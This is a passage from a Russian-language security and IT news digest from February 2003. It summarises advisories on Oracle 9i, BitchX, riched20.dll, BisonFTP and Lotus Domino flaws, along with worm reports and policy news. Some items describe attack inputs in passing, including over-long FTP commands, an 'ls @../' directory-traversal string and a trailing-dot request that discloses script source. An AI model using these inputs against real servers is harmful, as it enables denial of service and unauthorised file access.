также хорошо, как и обычная Opera 7. Зато с MSN она поступает весьма своеобразно: весь текст на сайте Microsoft искажается, словно его произносит один известный персонаж телевизионного "Маппет-шоу", обладающий чудовищным акцентом. "Search" ("Поиск") превращается в "Seerch", "Hotmail" (почта MSN) в "Hutmeeel", "Money" ("Деньги") в "Muney" и так далее. Подробности - http://www.compulenta.ru/2003/2/18/37651/
18/02/2003 15:48 Как остановить червей раньше, чем они остановят Internet?
25-го января 2003 года сеть Internet была выведена из строя на несколько часов. Люди лишились очень важного средства общения, развлечения и бизнеса. Это явилось следствием активности «сетевого червя» - вирусоподобной вредоносной программы. Кто виноват? Может ли это повториться? Насколько серьезна угроза? Как защититься сейчас и в перспективе? Все эти вопросы ребята из SECURITYLAB задали сегодня ведущим русским экспертам по компьютерной безопасности и производителям выдающихся решений в области антивирусной безопасности. Очень интересные ответы специалистов - рекомендуем ознакомиться. Среди ответивших были замечены: Евгений Касперский (www.avp.ru), ЗАРАЗА (http://security.nnov.ru), Алексей Лукацкий (www.infosec.ru), Cybervlad (www.bugtraq.ru), Фернандо де ля Квадра (международный технический обозреватель компании Panda Software). Интервью - http://www.securitylab.ru/?ID=35995
18/02/2003 14:28 Многочисленные уязвимости в Oracle 9i.
Марк Литчфилд от имени руководимой им NGSSoftware выпустил очередную порцию бюллетеней по безопасности, в которых констатируется факт наличия множественных уязвимостей в полурной СУБД Oracle9i. Было опубликовано аж 5 бюллетеней, в каждом из которых описывается определённый тип уязвимости: #NISR16022003a, 16022003b, 16022003c, 16022003d, 16022003e. Подробное описыванте каждой уязвимости заняло бы очень много места, поэтому перечислим только вкратце основные виды уязвимостей: удалённое переполнение буфера в процедуре аутентификации (длинное имя пользователя может привести к удалённому выполнению произвольных команд), удалённое переполнение буфера в функции TO_TIMESTAMP_TZ, удалённое переполнение буфера в функции TZ_OFFSET, уязвимость формата строки в сервере приложений Oracle 9i, удалённое переполнение буфера в функции bfilename(). Как было указано, наличие всех вышеперечисленных уязвимостей позволяет удалённо выполнить произвольный код в контексте полномочий пользователя, от имени которого запущен сервер Oracle - в Linux/UNIX: "Oracle", "Local System" в Win NT/2K/XP. Oracle были выпущены соответствующие патчи для всех версий CУБД. Подробности - http://www.ngssoftware.com/
18/02/2003 13:24 Чеченским боевикам удалось заполучить деньги Билла Гейтса.
Исламский фонд Benevolence International Foundation, финансировавший чеченских боевиков, использовал в том числе средства компании Microsoft. Об этом в прямом эфире радио "Россия" заявил помощник президента России Сергей Ястржембский. По его словам, уже доказано, что на протяжении ряда лет эта организация, обманывая своих спонсоров, среди которых была и компания Microsoft, финансировала чеченских боевиков. Помощник президента подчеркнул, что сама компания Microsoft не знала, куда идут ее средства, передает информационное агентство РИА "Новости". По словам Ястржембского, во главе фонда стоял человек, который был близок к "Аль-Каеде" - некий господин Арнаут. Сейчас в США идет судебный процесс над над руководителями этого фонда, зарегистрированного в начале 90-х годов в штате Иллинойс. Как сообщил журналистам помощник президента России, на процессе было доказано, что в 2000-2001 годах свыше 40 процентов средств Benevolence International Foundation было переведено в Чечню. По словам Ястржембского, только за четыре месяца 2000 года со счетов фонда в Citybank было направлено 19 электронных переводов на сумму 700 тысяч долларов. "Обналичка происходила в Тбилиси, Баку и Риге, выявлены механизмы переправки денег и на что они тратились", - подчеркнул Ястржембский. Подробности - http://lenta.ru/vojna/2003/02/18/financing/
18/02/2003 12:59 Объявлен конкурс, посвящённый исследованию Honeyd.
Niels Provos (provos-honeyd@citi.umich.edu) объявил о начале конкурса, посвящённого исследованию Honeyd, версия 0.5 которого была выпущена в прошлые выходные. Проект Honeyd предназначен для организации на одном сервере группы виртуальных хостов, каждый из которых может быть сконфигурирован для запуска определённых сервисов, имитации поведения определённых ОС. Целью проекта является исследование методов и способов, которые применяют современные хакеры для взлома сервера. Целью проводимого исследования является разработка дополнительных инструментов для Honeyd, в числе которых: улучшение инструментария анализа лог-файлов, пассивное наблюдение за соединениями сервера, улучшение инструментария маршрутизации и др. Учреждены призы за лучшие исследования: в частности, опалата участия в коференции CanSecWest/core0 с оплатой 4-х дней проживания в отеле, а также 100$ и 200$ сертификаты от Amazon. Луяшие 10 исследователей также будут поощрены авторским экземпляром книги Lance Spitzner "Honeypots: Tracking Hackers". Исследование официально начать вчера - 17 февраля и будет закончено 24:00 GMT в пятницу 14 марта (крайний срок подачи документов исследования). Результаты будут опубликованы 21 марта. Так что, кто чувствует себя в состоянии внести существенный вклад в проект Honeyd - добро пожаловать. Подробности - http://www.citi.umich.edu/u/provos/honeyd/challenge.html
18/02/2003 11:56 Взломано 5 млн. счетов владельцев Visa и MasterCard.
Счета более чем 5 миллионов держателей пластиковых карт Visa и MasterCard были взломаны в США в результате хакерской атаки на процессинговый центр, обрабатывавший платежи торговых предприятий. Об этом в понедельник сообщили представители платежных систем. Представители платежных систем утверждают, что они не обладают информацией о деталях и времени взлома, поскольку злоумышленники действовали через процессинговый центр, используемый розничными торговцами и не входящий в систему Visa и MasterCard. Однако, по их данным, злоумышленники пока не воспользовались полученной информацией для оплаты покупок. По данным платежных систем, были взломаны более двух миллионов счетов MasterCard и 3,4 миллиона счетов Visa. Хотя компании утверждают, что им неизвестна дата взлома, ясно, что в лучшем случае он имел место несколько недель назад. Представители MasterCard сообщили, что они начали извещать своих клиентов о взломе 3 февраля. Visa утверждает, что оповестила держателей своих карт «немедленно». Ни Visa, ни MasterCard не раскрывают название процессингового центра, из которого произошла утечка информации. Сейчас известно только, что этот центр обслуживает магазины, расположенные в различных штатах США, и дело имеет отнюдь не региональный масштаб. Расследованием инцидента занимаются правоохранительные органы. По данным же CNN, хакеры (или хакер) получили доступ к 2,2 миллионам кредитных карточек Visa и MasterCard. CNN обратилась к нескольким крупным американским банкам, но только из двух из них пришел ответ. Citizens Bank сообщил, что в нем были закрыты 8800 счетов, которые были взломаны, а представители Bank One сообщили, что их клиенты не пострадали. Источник - http://www.reuters.com/ Новость от CNN - http://edition.cnn.com/2003/TECH/02/17/creditcard.hack/index.html
18/02/2003 11:29 Уязвимость в BitchX.
Сообщается о возможности проведения атаки типа DoS Против популярного в среде UNIX IRC-клиента BitchX. Было выяснено, что при посылке "кривого" пакета RPL_NAMREPLY со значением 353 происходит ошибка сегментации (segfault) BitchX с DoS. Обнаружено в версиях 75p3, 1.0c16, 1.0c19, 1.0c20cvs. Версия 1.0c18 уязвимости не подвержена. К сообщению был приложен патч и эксплоит, позволяющий удалённо провести описанную атаку. Источник - http://www.securityfocus.com
18/02/2003 10:16 Очередная уязвимость в Windows.
Господа из китайской команды Security Defence Stdio сообщают об обнаружении очередной уязвимости, затрагивающие операционные системы Windows: 98, 2K, XP. Связана она с приложениями, использующими динамическую библиотеку riched20.dll (связана с обработкой RTF-файлов). Обнаруженная уязвимость позволяет выполнить переполнения буфера в используемом приложении с дальнейшим прекращением функционирования его. Природа уязвимости связана с интерпретацией фировой строки, интерпретируещей размер символов в RTF-файле (задаётся "\fs" в тексте документа). В результате анализа было установлено, что при задании размера символов >1024b происходит переполнение буфера, при задании же размера >65536b происходит крах приложения. Как указывают авторы, очень большое количество приложений зависит от riched20.dll, для использования уязвимости удалённый атакующий должен послать специально сформированный RTF-файл. Однако, как указывается, выполнение произвольного кода в результате использования этой уязвимости довольно затруднительно. Подробности - http://www.yoursft.com/E_affiche001.txt
17/02/2003 19:48 Подделка реферрера.
По мотивам bugtraq.ru. Фильтрация тегов - залог здоровья ;) Если о ней забывать, то не стоит потом удивляться некоторым забавным вещам. Ребята из rootsecure.net обнаружили, что на многих сайтах используются самопальные скрипты, обрабатывающие информацию о входящих соединениях и не фильтрующие при этом HTML-теги, что дает возможность, например, подделывать адрес реферрера, т.е. URL, с которого клиент попал на данную страницу. Результат зависит от того, для чего этот реферрер используется. В самом безобидном случае будет просто отображаться не тот адрес, а в худшем... Подробности - http://www.rootsecure.net/?p=reports/blog_hijacking
17/02/2003 18:02 Недельный отчет о вирусах Panda Software.
Екатеринбургская антивирусная компания Panda Software опубликовала традиционный еженедельный отчёт о вирусной активности. В нём рассмотрены: троянец Egrof, версия 'C' червя Kazoa, а также приложение NTRootkit, используемое хакерами для скрытия следов своей деятельности на атакуемых компьютерах. Троян Egrof сохраняет в файл FLOG.TXT имя пользователя и пароль, вводимые пользователем зараженного компьютера, для доступа к системе сообщений America On Line (AOL). Впоследствии это позволяет злоумышленникам использовать учетную запись данного компьютера для пользования услугами America On Line (AOL). О черве Kazoa мы сообщали в предыдущих выпусках новостей. Утилита NTRootkit работает только на компьютерах с операционными системами Windows NT, 2000 или XP. После получения удаленного доступа к компьютеру, хакер устанавливает на нем данную программу, в результате чего в системной папке Windows создаются файлы DEPLOY.EXE и NTROOT.SYS. Более подробно - http://www.viruslab.ru/press/index.php?go=show&num=114
17/02/2003 17:08 Уязвимости в BisonFTP
По сообщениям, полученным из списка рассылки Bugtraq, ftp сервер BisonFTP содержит уязвимости, позволяющие удаленному пользователю произвести DOS атаку на сервер путем посылки слишком длинной команды (например ls или cwd длиной более 4300 байт), а также получить информацию о файлах, расположенный вне ftp root директории (путем формирования команды подобной ls @../). Источник - http://www.securityfocus.com
17/02/2003 16:02 Linux 2.5.61-ac1
Несколько минут назад Алан Кокс в рассылке lkml сообщил о выходе патча ac-серии для ядра Linux 2.5.61 нестабильной ветви. На этот раз:- обновление в OSS драйверах
- багофиксы для VIA Rhine
- произведена чистка в сетевом коде
- правки в коде для alpha
и многое другое Скачать - patch-2.5.61-ac1.bz2
17/02/2003 15:48 Адрес e-mail, похожий на номер телефона?
Администрация Буша поддержала международный проект по преобразованию телефонных номеров в интернет-адреса. В недавнем внутреннем письме Министерство торговли порекомендовало Соединенным Штатам принять участие в новой системе электронных номеров ENUM, которая позволит использовать единый идентификатор для разнообразных целей, включая номер мобильного телефона, адрес e-mail, факс и идентификатор в системе немедленного обмена сообщениями. Система ENUM призвана ускорить слияние телефонной сети с интернетом и, как ожидается, придаст гигантское ускорение развитию сервисов онлайновой телефонии. «Соединенные Штаты должны ухватиться за эту возможность и предпринять шаги к участию в e164.arpa, отстаивая высочайшие стандарты безопасности, конкуренции и защиты частной информации», — пишет заместитель министра торговли Нэнси Виктори (Nancy Victory) в письме, адресованном Госдепартаменту. На e164.arpa оканчивается домен, который предполагается использовать для адресов ENUM. Когда домены ENUM заработают, пользователей можно будет идентифицировать по их телефонному номеру с учетом кода страны. Это означает, что, например, телефонный номер +46-8-9761234 преобразуется в интернет-адрес 4.3.2.1.6.7.9.8.6.4.e164.arpa, причем процесс преобразования, по идее, должен быть автоматизированным и прозрачным для пользователя. Система ENUM — плод труда рабочей группы Telephone Number Mapping организации Internet Engineering Task Force, которая в сентябре 2000 года выпустила проект стандарта RFC 2916. На сегодняшний день к процессу e164.arpa присоединились и планируют проведение испытаний 13 стран-членов Международного союза электросвязи (ITU). Подробности - http://zdnet.com.com/2100-1104-984591.html
17/02/2003 15:24 Краткая история сетевых вирусов и атак.
Короткий обзор наиболее значительных происшествий в мире IT, связанных а сетевыми атаками и вирусами в мировой истории. Автор охватывает период с далекого 45ого, до января этого года, прошедшего под знаком "Slammer" Ознакомиться - http://www.securityfocus.com/news/2445
17/02/2003 15:15 Microsoft латает свой собственный патч.
Пользователи браузера Internet Exlorer, скачавшие выпущенный на прошлой неделе патч, обнаружили, что теперь не могут получить доступ к некоторым веб- сайтам, использующим авторизацию. При этом в их число попал и MSN, собственный портал Microsoft. Кумулятивный патч MS03-004 для Internet Explorer версий 5.01, 5.5 и 6, включающий все предыдущие исправления, должен был ликвидировать две уязвимости, связанные с использованием функции showHelp() и реализацией разграничения доступа к данным между окнами IE, работающими с разными доменами. При заходе пользователя на страницу со специальным html-кодом злоумышленник, используя эти уязвимости, мог выполнить на удаленном компьютере свой программный код. Этому патчу был присвоен статус "критического", то есть обязательного для установки. Исправленный патч - http://www.microsoft.com/windows/ie/downloads/critical/813951/
17/02/2003 14:39 AOL прекратит развитие Netscape Navigator.
На сайте MozillaNews появился интересный материал о судьбах браузера Netscape, проекта Mozilla и созданного его участниками движка Gecko. Основой для статьи послужили сведения, полученные из компетентных источников внутри AOL. Именно в этой компании, в своё время приобретшей Netscape, до сих пор работают многие активные участники создания Mozilla. Если верить источникам MozillaNews, в скором времени разработка новых версий браузера Netscape будет приостановлена. Скорее всего, в свет выйдет еще только один релиз со значительным количеством нововведений. Далее усилия разработчиков будут сосредоточены на исправлении ошибок в уже выпущенных версиях. Освободившиеся силы будут переброшены на другие проекты или сокращены. В пользу такого варианта развития событий говорят недавние увольнения в AOL, серьезно затронувшие и группу разработчиков Netscape. Netscape давно перестал быть для AOL приоритетным направлением. О переориентации подразделения Netscape было объявлено еще в 2001 г., так как в AOL прекрасно понимают, что война браузеров проиграна, и конкурировать с Internet Explorer не имеет смысла. Противники продукции Microsoft составляют небольшую долю пользователей, многие из них работают не с Windows, так что логичным выбором для них будет не Netscape, а лежащий в его основе браузер Mozilla. Подробности - http://www.mozillanews.org/index.php3?...
17/02/2003 13:35 Раскрытие исходного кода сценариев в Web сервере Lotus Domino.
Уязвимость раскрытия файла обнаружена в Web сервере Lotus Domino. Удаленный пользователь может создать специальный запрос, который раскроет содержание некоторых типов файлов. Сообщается, что удаленный пользователь может добавить точку к концу некоторых типов файлов Lotus, устанавливаемых не по умолчанию (т.е. отличных от .NSF, .NTF и т.п.), чтобы получить этот файл. Уязвимость может использоваться для просмотра исходного кода сценариев на сервере и включаемых файлов. Уязвимость обнаружена в Lotus Domino Web Server 5,6. Подробнее - http://www.securitylab.ru/?ID=35941
17/02/2003 12:41 За эпидемию вируса Slammer ответит Symantec?
На днях стало известно о том, что специалисты компании Symantec, специализирующейся на компьютерной безопасности, придерживали информацию о распространении одного из самых вредоносных вирусов последнего времени. В компании Symantec утверждают, что знали и идентифицировали червя Slammer (также известного под названием Helkern) за несколько часов до того, как он парализовал работу нескольких участков интернета в конце января. Однако, несмотря на всю серьезность положения, Symantec известила о возможных проблемах лишь часть избранных клиентов. Между тем, если бы информация была распространена шире, это могло бы предотвратить распространение вируса по всему миру. Обычно антивирусные компании обмениваются образцами обнаруженных вредоносных программ друг с другом практически немедленно после их обнаружения, невзирая на общую конкурентную ситуацию. Это делается для того, что бы все существующие клиенты смогли вовремя обновить свои базы и эффективно противостоять атаке. Поражение червем Slammer несопоставимо с трагедией, например, 11 сентября, однако для интернета оно является событием именно такого масштаба. Телекоммуникационные системы Азии и Европы работали очень медленно, а банкоматы в Северной Америке перестали выдавать наличные. Также прекратили работу некоторые системы резервирования и заказа авиабилетов. О том, что компании Symantec было известно о проблеме заранее, стало официально известно из пресс-релиза, распространенного Symantec и посвященного продукту DeepSight Threat Management System. В частности, в нем сообщается, что компания «обнаружила червя за несколько часов до того, как он начал активно размножаться», после чего «была запущена процедура извещения (пользователей DeepSight), позволявшая администраторам противостоять атаке». Как сообщает Wired News, многие эксперты были сильно разозлены тем, что Symantec не распространил никакой информации о том, что в компании имеются сведения о Slammer. Источник - http://www.cnews.ru/
17/02/2003 10:22 Kernel Traffic #205
Zack Brown выпустил очередной номер своего журнала Kernel Traffic. Kernel Traffic - краткий обзор переписки разработчиков ядра OS Linux, проходящей в рассылке LKML (linux kernel mailing list). Выходит KT каждые 3-4 дня, содержит тематический срез ключевых вопросов, обсуждаемых в lkml и является неплохой альтернативой для тех, кому лень разбирать весь объем писем рассылки (иногда до нескольких сотен у сутки). Источник - http://linuxtoday.com KT #205 - http://kt.zork.net/kernel-traffic/kt20030216_205.html
17/02/2003 09:28 Слабый криптоалгоритм в mcookie.
Как сообщается в бюллетене по безопасности Mandrakesoft MDKSA-2003:016, в утилите mcookie, входящей в состав пакета util-linux обнаружен слабый криптоалгоритм формирования случайных чисел (используется псевдоустройство /dev/random), делающий возможным предсказание этого самого случайного значения. Mcookie используется для генерации случайного 128-битного HEX-числа, применяемого для осуществления системы X authority. Типичным случаем применения является команда: xauth add :0 . `mcookie`. Выпущенный Mandrakesoft патч устраняет эту уязвимость путём использования псевдослучайного устрояства /dev/urandom. Подробнее - https://qa.mandrakesoft.com
16/02/2003 12:05 Cтатья "Art of Deception: Unprinted Chapter 1".
На сайте Дмитрия Леонова bugtraq.ru опубликован перевод статьи "Art of Deception: Unprinted Chapter 1", которая, как написано, является историей Кевина, рассказанная Кевином Митником. Собственно, это оригинальная глава, пропущенная в опубликованной книге Кевина Митника. Была выложена на сайте kevinmitnick.com. Cтатья - http://bugtraq.ru/library/books/mitnick/index.html
16/02/2003 11:47 Компьютерным сетям Великобритании угрожают атаки кибертеррористов.
"Компьютерным сетям Великобритании угрожают атаки кибертеррористов", - заявил один из высокопоставленных чиновников в правительстве. Эксперты по кибербезопасности опасаются, что объектом нападения может стать так называемая критическая национальная инфраструктура (CNI), имеющая недостаточно защищенную систему доступа к ней. Ключевую роль в борьбе с угрозой кибернападения играют менеджеры по защите информационных технологий, которые уже предоставили информацию по поводу сложившейся достаточно тревожной ситуации. Сведения о возможной террористической акции были получены благодаря бдительности системных администраторов, которые установили увеличение попыток несанкционированного доступа к компьютерным сетям. Как заявил Mark O'Hara (Марк О'хара), исполнительный директор финансовой службы по информационной безопасности фирмы Hydra, деловые структуры, дающие возможность объединять отдельные системы для совместного использования данных, обеспечивают злоумышленников возможностями доступа. «Чем меньше вы связаны, тем вы сильнее», - гласит старая пословица. Увеличивается количество видов коммерческой деятельности, а главное зависимость национальная инфраструктура (CNI) от внешних кибератак - ставит задачу информационной безопасности в число приоритетных. Источник - http://www.crime-research.org
16/02/2003 11:07 Выход Linux 2.5.61.
Линус Торвальдс объявил о выпуске очередной версии девелоперской ветки ядра Linux - 2.5.61. Обновления в сетевой подсистеме, acpi, в коде для sparc, а также большое количество мелких исправлений. Changelog - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.61
16/02/2003 10:53 Настройка XFree86 на OpenBSD.
На сайте shintara.net опубликовано довольно подробное руководство "Building X on OpenBSD" по пошаговой настройке реализации XWindow под названием XFree86 в ОС OpenBSD. Статья - http://shintara.net/xonopenbsd.htm
16/02/2003 10:26 Обзор грядущего ядра Linux (2.6).
На сайте opennet.ru приведена ссылка на обзор "The Linux Kernel's Next Incarnation" затрагивает тему новинок реализованных в Linux ядре 2.6. Обзор опубликован сервером newsfactor. Обзор - http://www.newsfactor.com/perl/story/20698.html
16/02/2003 09:24 Gnome 2.2 расчищает рабочий стол Linux.
Под таким названием в ZDNET появилась статья Мэтью Броурзма (Matthew Broersma). Последняя редакция настольного ПО Gnome для операционных систем Linux и Unix указывает на изменение позиции разработчиков: теперь они нацелены на интеграцию. Gnome 2.2 выходит почти через пять месяцев после выпуска столбовой версии 2.0. В ПО добавлен ряд новых функций, таких как контекстно-зависимые меню, вызывающие другие приложения, и диалоговые окна Properties с подробной информацией о медиафайлах. Однако в новой версии заметна и растущая среди разработчиков тенденция к учету общих спецификаций, что отражает стремление гарантировать согласованную работу пользовательского интерфейса и приложений. Обзору новых возможностей недавно вышедшего Gnome 2.2 и посвящена вышедшая статья. Статья - http://zdnet.ru/?ID=295827
16/02/2003 09:04 Выпущено обновление Mac OS X.
Apple Computer выпустил обновление операционной системы Mac OS X 10.2.4, которое решает проблемы, связанные с надежностью встроенных приложений и сервисов. Обновление улучшает функциональные возможности и надежность Address Book, графики, поиска, FireWire, OpenGL и Sherlock и совместимость с Classic. Кроме того, были сделаны улучшения в AFP и файловом сервисе Windows, а также в возможностях работы с аудио, записью на диск, графикой и печатью. Также были исправлены проблемы в некоторых локализованных версиях. Для инсталляции доступно две версии: Mac OS X 10.2.4 Update для обновления до новой версии и Mac OS X 10.2.4 Update (Combo) для обновления версий 10.2.3 и младше до 10.2.4. Более подробно - http://www.cnews.ru/newsline/index.shtml?2003/02/14/140914
15/02/2003 17:00 Госдума хочет регулировать Интернет дополнительными законами.
Госдума на пленарном заседании в среду отклонила в первом чтении проект закона "О внесении дополнений в федеральный закон "Об информации, информатизации и защите информации". Законопроект, внесенный депутатом Сергеем Глазьевым, ограничивает регулирование деятельности физических и юридических лиц в глобальной сети Интернета только нормами международного права и федеральными законами. Действующую редакцию закона предлагается дополнить новой статьей об особенностях регулирования деятельности физических и юридических лиц в Интернете. Эта статья предусматривает, что деятельность в Интернете физических и юридических лиц, находящихся под юрисдикцией Российской Федерации, регулируется федеральными законами и нормами международного права. Правительство и комитет Госдумы по информационной политике выступили против принятия законопроекта, считая, что данное ограничение не согласуется с действующим законодательством, в том числе с Конституцией РФ и с законом "О правительстве РФ", поскольку ряд вопросов, входящих в компетенцию президента и правительства (обеспечение информационной безопасности, лицензирование, использование сети интернета в органах государственной власти, в сферах культуры, образования, науки и др.), не может быть реализован. Источник - http://www.internet.ru
15/02/2003 14:01 Panda Software сообщает о появлении нового червя/троянца.
Компания Panda Software сообщает о появлении нового червя/троянца: Kazoa.C, также известного как Gool (мы вчера вкратцце сообщили о нём, как о черве, предлагающем посмотреть фотографии Кэтрин Зэты-Джонс). Написанный на Delphi, этот червь поражает системы, работающие под управлением операционных систем Windows XP/2000 Pro/NT/Me/98/95 и распространяется посредством популярной программы KaZaA , а также с помощью IRC. Червь копирует себя в файлы, некоторые из которых преподносятся как эротические фотографии знаменитых людей ( Кэтрин Зета Джонс (Catherine Zeta Jones), Памела Андерсон (Pamela Anderson) или Сандра Буллок (Sandra Bullock)). При заражении компьютера он вносит некоторые записи в системный реестр для того, чтобы автоматически запускаться при каждой загрузке Windows. Кроме того, он открывает порт (обычно 31337) и рассылает IP адрес зараженного компьютера по сети Internet, делая систему беззащитной перед злоумышленниками. В результате атакующий получает возможность выполнять следующие действия на зараженном компьютере: отправлять сообщения, скрыть Панель задач, очистить содержимое CMOS, вызвать ошибку на компьютере, использовать верхнюю память, оперировать файлами и отправлять их, перехватывать содержимое окон и строк, вводимых с клавиатуры, получить информацию о параметрах операционной системы и характеристиках компьютера. Более подробно - http://www.viruslab.ru/
15/02/2003 13:38 Spyware незаметно завоевывает Европу.
Согласно недавно опубликованному исследованию компании Websense, на компьютерах трети из всех участвовавших в проекте европейских компаний были обнаружены так называемые "spyware", шпионские программы, позволяющие производить неавторизованный доступ к хранящейся информации со стороны конкурентов, хакеров или рекламных агентств. Подобные шпионские программы обычно устанавливаются на компьютер незаметно для пользователя вместе с другим, "легально" скачиваемым из интернета действительно полезным софтом. Для проверки своего компьютера на наличие подобных программ можно использовать широко известную утилиту Ad-aware от компании Lavasoft. Источник - http://www.viruslist.ru
15/02/2003 13:03 Разработчики антивирусов готовят антиспамовое ПО.
Весной основные американские разработчики антивирусов планируют представить свои программные продукты для борьбы со спамом. Symantec в этом квартале представит антиспамовое решение для корпоративного сектора. При этом, согласно источникам в компании, это ПО будет работать не отдельно, а интегрироваться в другие продукты Symantec. Trend Micro, чьи антивирусы включены в BIOS значительной части материнских плат, также готовит корпоративное решение для борьбы со спамом. Разработчики обещают высокий процент перехвата нежелательной корреспонденции, низкое число ложных срабатываний и быструю адаптируемость системы. Network Associates совместно с приобретенными McAfee и DeerSoft готовит целую серию средств борьбы со спамом. Вначале будет выпущен SpamKiller для использования в корпоративных почтовых сетях, а в третьем квартале выйдет его модификация с возможностью интеграции с пакетами McAfee GroupShield и WebShield. Пока что Network Assosiaties выпускает SpamKiller только для домашнего пользования. Сегодня все ИТ-специалисты рассматривают спам как весьма серьезную угрозу для отрасли, сопоставимую, по масштабам ущерба, с эпидемиями компьютерных вирусов. Напомним, что на этой неделе о доступности своего анти-спамового продукта объявила "Лаборатория Касперского". Источник - http://www.crn.com
15/02/2003 12:43 Выход Opera 7 for Linux.
Вчера на сайте Opera Software выложены первые исходники бета-версии популярного броузера Opera 7. Выложена статические и пакеты с разделяемыми библиотеками в форматах RPM, DEB, BZ2, TGZ. Скачать - http://web.opera.com/download/unix/untested/intel-linux/353-20030214-P1/
15/02/2003 12:30 Пентагон инвестирует в исследования частной информации.
Получив от Пентагона финансирование более чем на 20 млн долларов исследователи делают первые шаги для разработки специальной системы, которая позволит Пентагону контролировать и получать полную информацию о миллионах людей, пользующихся услугами в финансовых, текоммуникационных, туристических и медицинских компаний. По словам Пита Алдриджа, главы технологического подразделения Пентагона, созданная система позволит контролировать миллионы данных и предупредить действия террористов как внутри страны, так и за ее пределами. "Пентагон очень заинтересован в сотрудничестве с частными компаниями, которые контролируют платежные системы; в частности имеют базу данных по кредитным карточкам и осуществляют банковские счета. Мы хотим наладить более тесное сотрудничество с компаниями, занимающимися продажей оружия или предоставлением в аренду автомобилей" - говорит Пит Алдридж. "Вся эта информация вкупе с уже накопленной базой федерального правительства позволит эффективно конторолировать малейшие намерения террористов и предупреждать риск возникновения терактов" - уверен Алдридж. Источник - http://www.internet.ru
15/02/2003 11:35 Литовцы отказываются закрывать "Кавказ-центр".
В МИД Литвы заявили, что не намерены комментировать работу сайта информационного агентства "Кавказ-центр", размещенного на сервере, обслуживаемом одной из литовских интернет-фирм. Литовскому МИД "известно о сайте "Кавказ-центр" на сервере литовской интернет-фирмы. Этот факт уже комментировал Департамент госбезопасности Литвы, поэтому МИД не предоставляет комментарии по этому вопросу", - заявила в четверг "Интерфаксу" директор департамента информации МИД Дайва Римашаускайте. В Москве позицию Вильнюса воспринимают, как минимум, с недоумением. "Мы уже сделали представление литовскому посольству в Москве и выражаем надежду на то, что литовские власти предпримут все необходимые меры с тем, чтобы закрыть сайт террористов. Пользуясь случаем, я хотел бы напомнить, что буквально два года назад все государства проголосовали в поддержку резолюции по борьбе с терроризмом. И мы выражаем надежду на то, что все страны будут выполнять международные обязательства, которые они взяли перед Организацией Объединенных Наций", - заявил в четверг официальный представитель МИД РФ Александр Яковенко. Источник - http://www.vesti.ru/news.html?id=26013&sid=4
15/02/2003 11:21 Белый дом доработал национальную стратегию по обеспечению безопасности в киберпространстве.
В пятницу американское правительство опубликовало план по обеспечению безопасности в киберпространстве, сообщает Reuters. В этом документе, занимающем 60 страниц и озаглавленном "Национальная стратегия по обеспечению безопасности в киберпространстве" (National Strategy to Secure Cyberspace), правительство США заявляет об увеличении затрат на разработки в этой области и об усилении взаимодействия интернет-компаний и производителей программного обеспечения с государственными структурами безопасности, такими как ФБР. Правительственный план отводит основную роль в обеспечении безопасности в киберпространстве частным компаниям, которые контролируют до 85 процентов глобальной компьютерной сети, и пользователям Интернета, а государство должно содействовать разработкам компаний по сетевой безопасности и проводить акции по пропаганде использования частными пользователями антивирусных программ. Контроль за обеспечением безопасности в Интернете будет осуществлять Министерство национальной безопасности США. Подробности - http://dailynews.yahoo.com/news?...
14/02/2003 22:19 Интернет-червь соблазняет юзеров предложением посмотреть непристойные фото Кэтрин Зета-Джонс.
В Интернете появился новый червь, который соблазняет доверчивых юзером предложением посмотреть фотографии декольтированной Кэтрин Зета-Джонс и других звезд. Об этом сообщает Reuters со ссылкой на представителей фирмы Sophos, занимающейся разработкой антивирусных программ. Вирус в первую очередь поражает пользователей службы обмена музыкальных картотек Kazaa. Червя запустили после скандала, разгоревшегося вокруг незаконной публикации фотографий свадебной церемонии Майкла Дугласа и Кэтрин Зета-Джонс. Раньше подобный вирус предлагал полюбоваться Анной Курниковой. Вероятно, подобные вирусы могут стать определенным мерилом популярности певиц и кинозвезд. Источник - http://grani.ru
14/02/2003 20:07 Спецслужбы США будут преследовать хакеров-патриотов.
Входящий в состав ФБР национальный центр защиты инфраструктуры США (NIPC) распространил предупреждение о возможном росте числа хакерских атак в связи с увеличением напряженности вокруг Ирака. NIPC ожидает роста всех видов компьютерных преступлений - от рассылки спама до распространения вирусов и DoS-атак. При этом в центре выделяют три основных типа компьютерных преступлений, связанных с ситуацией вокруг Ирака: атаки патриотично настроенных американцев на проиракские сайты, атаки противников войны на ресурсы американских государственных структур и, наконец, атаки, использующие кризис вокруг Ирака в качестве прикрытия и преследующие совершенно иные, неполитические цели. В NIPC подчеркивают, что хакерские атаки всех трех типов будут расцениваться как компьютерные преступления. Как сторонникам, так и противникам войны не стоит выражать свою точку зрения путем совершения компьютерных преступлений. В ФБР призывают всех пользователей повысить бдительность и с осторожностью относиться к различным политическим воззваниям, распространяемым по интернету. Под их видом вполне могут распространяться вирусы или трояны. Источник - http://www.compulenta.ru
14/02/2003 16:14 З интересных "инструментика".
Как сообщает Eyal Udassin из WebCohort Ltd., на их сервере выложены 3 новых фриварных инструмента. ITR (Interactive TCP Relay) - инструмент, предназначенный для тестирования безопасности сред прилдожений клиент-сервер, онсованнных не на HTTP-протоколе. Также обеспечивает средством HTTP-прокси. Второй инструмент - BOU (Buffer Overflow Utility) - представляет собой утилиту командной строки, написанное на Java и предназначенное для проверки возможности переполнения буфера Web-приложений. Поддерживает методы GET и POST. Третья утилита - Mapper - позволяет составлять структуру файлов, параметров файлов, а также параметры любого сайта, который Вы посещаете. Рекомендуем ознакомиться. Сайт - http://www.webcohort.com
14/02/2003 13:47 Cisco IOS может принимать поддельные ICMP Redirect - пакеты и перенаправлять их неправильному адресату.
Уязвимость обнаружена в операционной системе Cisco IOS. В некоторых конфигурациях, маршрутизатор может принимать поддельные ICMP redirect - пакеты. Cisco выпустил Field Notice (23074), в котором предупреждается, что, если заблокирована IP маршрутизация, маршрутизатор примет поддельный ICMP redirect пакет, и изменит соответствующую таблицу маршрутизации. Согласно сообщению, IP маршрутизация включена по умолчанию, так что заданные по умолчанию конфигурации не уязвимы к обнаруженной проблеме. Уязвимость может использоваться для DoS нападений или перенаправления пакетов к другому местоположению. Уязвимость обнаружена в Cisco IOS 12.2 и более ранних версиях Подробности - http://www.SecurityLab.ru/?ID=35929
14/02/2003 10:35 Сравнительное исследование дефектов показывает превосходство стека TCP/IP Linux.
